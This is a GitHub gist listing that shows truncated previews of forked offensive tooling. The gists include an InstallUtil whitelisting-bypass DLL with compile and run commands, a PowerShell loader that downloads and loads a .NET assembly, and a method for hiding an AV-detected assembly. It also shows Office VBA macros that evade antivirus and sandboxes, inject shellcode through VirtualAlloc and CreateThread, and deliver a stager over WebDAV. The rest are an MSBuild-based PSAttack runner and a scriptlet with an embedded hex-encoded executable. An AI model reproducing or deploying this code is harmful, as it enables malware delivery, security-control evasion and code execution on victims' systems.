cryptonic01
/ installUtil.cs
Created
July 24, 2018 18:30
— forked from Arno0x/installUtil.cs
Example of a C# DLL to be used with the InstallUtil utility to make it execute some arbitrary code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| ===================================== COMPILING ===================================== | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs | |
| ===================================== USAGE ===================================== | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll | |
| */ |
cryptonic01
/ loadAssembly_method1.ps1
Created
July 24, 2018 18:29
— forked from Arno0x/loadAssembly_method1.ps1
Load a .Net assembly dynamically from PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Source = @" | |
| using System; | |
| using System.Net; | |
| using System.Reflection; | |
| namespace LoadAssembly { | |
| public static class LoadAssembly { | |
| public static void load() { | |
| WebClient webclient = new WebClient(); | |
| IWebProxy defaultProxy = WebRequest.DefaultWebProxy; | |
| if (defaultProxy != null) { |
cryptonic01
/ detected.cs
Created
July 24, 2018 18:29
— forked from Arno0x/detected.cs
Hiding an AV detected assembly into another one
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| ===================================== COMPILING ===================================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:detected.exe detected.cs | |
| */ | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; |
cryptonic01
/ officeEmbeddedFileDecode.vba
Created
July 24, 2018 18:28
— forked from Arno0x/officeEmbeddedFileDecode.vba
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' This is a deobfuscated view of the 'vba-exe' output format of metasploit payload | |
| ' | |
| ' This macro searches for a marker paragraph, namely "marker" in the example below | |
| ' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to | |
| ' a local file. | |
| ' | |
| ' Example, in the word document: | |
| ' marker | |
| ' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 .... |
cryptonic01
/ macro_evade_av_01.vba
Created
July 24, 2018 18:28
— forked from Arno0x/macro_evade_av_01.vba
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Author Arno0x0x - https://twitter.com/Arno0x0x | |
| ' | |
| ' This macro downloads an XML bibliography source file. | |
| ' The <Title> element of this XML file actually contains a base64 encoded MSOffice template | |
| ' which itself contains another malicious macro much more detectable (meterpreter for instance). | |
| ' | |
| ' The base64 encoded file (payload) is extracted from the XML file, decoded and saved on the temporary folder | |
| ' Only then, an new Office Word object is instantiated to load this Office Template and run a specific macro from it. | |
| ' | |
| ' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers |
cryptonic01
/ macro_evade_av.vba
Created
July 24, 2018 18:27
— forked from Arno0x/macro_evade_av.vba
Load shellcode in macro, from bibliography souce
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #If VBA7 Then | |
| Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As LongPtr, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As LongPtr | |
| Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As LongPtr | |
| Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As LongPtr, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As LongPtr | |
| #Else | |
| Private Declare Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As Long, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As Long | |
| Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As Long | |
| Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As Long, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As Long | |
| #End If |
cryptonic01
/ macro_webdav_delivery.vba
Created
July 24, 2018 18:25
— forked from Arno0x/macro_webdav_delivery.vba
Office macro using WedDav mapping to deliver payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' | |
| ' Example of DBC2 msbuild.xml stager delivery through a webdav maping | |
| ' The stager file (msbuild.xml) can be generated from the DBC2 controller | |
| ' | |
| ' NOTE: | |
| ' msbuild.exe is supposed to accept a path straight from a webdav server (ex: msbuild.exe \\webdav_server\msbuild.xml) | |
| ' but it fails miserably for me, so I have to have to first map the drive... | |
| Sub Go() | |
| Dim cmd As String, srv As String |
cryptonic01
/ PSA_MSBUILD64.csproj
Created
July 13, 2018 01:30
— forked from NickTyrer/PSA_MSBUILD64.csproj
PSAttack Using MSBuild Bytestream
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), --> | |
| <!-- Based on Jared Haight work (https://github.com/jaredhaight/PSAttack), --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj --> | |
| <Target Name="PSAttack"> | |
| <PSA_MSBUILD64 /> | |
| </Target> | |
| <UsingTask | |
| TaskName="PSA_MSBUILD64" | |
| TaskFactory="CodeTaskFactory" |
cryptonic01
/ PSA64.cs
Created
July 13, 2018 01:30
— forked from NickTyrer/PSA64.cs
PSAttack Using MSBuild Downloader
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371" | |
| //Based on Jared Haight work (https://github.com/jaredhaight/PSAttack) | |
| //1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs" | |
| using System; | |
| using System.Reflection; | |
| namespace PSA64 | |
| { | |
| class Program | |
| { |
cryptonic01
/ dede.sct
Created
July 13, 2018 01:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="17807259" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var sBuffer = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C01030019F6DA580000000000000000E00002010B010B000014000000100000000000009E3200000020000000400000000040000020000000020000040000000000000004000000000000000080000000020000830B0100020040850000100000100000000010000010000000000000100000000000000000000000443200005700000000400000200C0000000000000000000000260000000F0000006000000C0000000C3100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000A4120000002000000014000000020000000000000000000000000000200000602E72737 |
NewerOlder